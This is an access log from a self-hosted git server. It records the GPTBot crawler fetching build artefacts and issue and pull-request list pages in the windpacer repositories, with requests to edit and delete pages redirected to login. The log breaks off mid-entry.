"https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:18:27:40 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:18:27:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:18:27:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 266046] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:18:27:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 156318] [Gzip 31.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:18:27:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:18:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:18:27:44 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:18:27:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:18:27:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 9814] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:18:27:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 9814] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:18:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 9814] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:18:27:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 9817] [Gzip 2.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:18:27:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 98054] [Gzip 28.89] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:18:27:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 58451] [Gzip 28.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:18:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 99212] [Gzip 28.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:18:27:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:18:27:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:18:27:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:18:27:52 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:18:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/Analysis-00.toc" -[17/Feb/2026:18:27:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 92594] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:18:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:18:27:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 154941] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:18:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 153194] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:18:27:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 902] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:18:27:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:18:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:18:27:56 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:18:27:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:18:27:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:18:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:18:27:57 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:18:27:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:18:27:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:18:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:18:27:58 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:18:27:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" -[17/Feb/2026:18:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc" -[17/Feb/2026:18:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13366] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10954] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" -[17/Feb/2026:18:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt" -[17/Feb/2026:18:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13366] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:18:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=oldest&state=all&type=all" -[17/Feb/2026:18:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/i18n.js?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" -[17/Feb/2026:18:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" -[17/Feb/2026:18:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" -[17/Feb/2026:18:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" -[17/Feb/2026:18:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" -[17/Feb/2026:18:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" -[17/Feb/2026:18:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" -[17/Feb/2026:18:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 